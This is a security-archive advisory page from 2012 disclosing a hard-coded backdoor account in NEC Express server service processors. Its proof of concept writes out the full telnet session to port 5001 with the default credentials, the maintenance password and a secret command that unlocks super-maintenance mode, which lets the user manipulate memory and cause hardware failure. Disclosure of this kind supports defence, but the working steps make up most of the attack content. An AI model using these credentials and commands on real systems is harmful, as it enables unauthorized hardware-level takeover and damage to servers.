what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NEC Backdoor Administrative Account

NEC Backdoor Administrative Account
Posted May 12, 2012
Authored by Djamshut Saarash

It appears that high performance servers from NEC suffer from a hard-coded administrative account that can manipulate memory.

tags | exploit
SHA-256 | eb4272908d1ad7c1709578a39de60f3cbe679c413cb078dd31662645958fdcb3

NEC Backdoor Administrative Account

Change Mirror Download
   H!

NEC Corp. has a product line of high perfomance servers
- http://www.nec.com.sg/index.php?q=products/enterprise-servers

In the documentations it is said that there is two user privilege
levels:

1. Common user - who can monitor the system status

2. Admin user - for configuring system hardware

but there is another very high privilege user, who can manipulate
memory and produce hardware falure.


POC

Connect to the service processor of the NEC Express server with the
telnet client on port 5001:


Integrated Service Processor.

Cabinet-ID:xx, Location:y, State:ssssss

iSP login: spfw<ENTER>

iSP password: nec<ENTER>

Copyright (C) 2005 NEC Corporation, All Rights Reserved.

Welcome to Integrated Service Processor.

iSP FW version : 01.00 generated on 01/01/2005 19:20:33

iSP MAIN MENU

0) OS(BIOS) serial console of partition#0 (INITIALIZING )

1) OS(BIOS) serial console of partition#1 (RUNNING )

V) Virtual System Operator Panel

S) iSP commands

E) Exit

DISCONNECTALL) disconnect all console connections

iSPyz> s<ENTER>


Go to maintanance mode with the command "cm", default password mainte

Now at the command mode enter (With the periods at the end):


iSP0m:MNT> nec=topvendor.

??? : good-bye.

Command mode was changed to super-maintenance mode.

BE CAREFUL to use each command.

iSP0m:@@@>


you now have super admin rights at the hardware level of the
supercomputer!


Thats it.....
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close